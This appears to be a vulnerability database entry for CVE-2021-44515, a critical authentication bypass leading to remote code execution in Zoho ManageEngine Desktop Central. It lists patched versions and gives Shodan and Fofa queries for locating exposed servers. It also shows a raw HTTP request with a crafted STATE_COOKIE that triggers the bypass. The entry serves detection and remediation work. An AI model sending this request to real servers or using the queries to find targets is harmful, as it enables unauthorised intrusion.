🔙 목록으로 돌아가기

CVE-2021-44515: Zoho ManageEngine Desktop Central - Remote Code Execution

TitleZoho ManageEngine Desktop Central - Remote Code Execution
AuthorAdam Crosser
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationFor Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.
CVSS Score9.8
EPSS Score0.94311
CVE IDCVE-2021-44515
CWE IDCWE-287
Shodan Queryhttp.title:"manageengine desktop central 10"
Fofa Querytitle="manageengine desktop central 10"app="zoho-manageengine-desktop"
Tags cve2021 cve zoho rce manageengine kev zohocorp vkev vuln

🔍 Vulnerability Description

Zoho ManageEngine Desktop Central contains an authentication bypass vulnerability that could allow an attacker to execute arbitrary code in the Desktop Central MSP server.

🌐 HTTP Request

GET /STATE_ID/123/agentLogUploader HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Connection: close
Cookie: STATE_COOKIE=&_REQS/_TIME/123
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-44515.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-44515.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A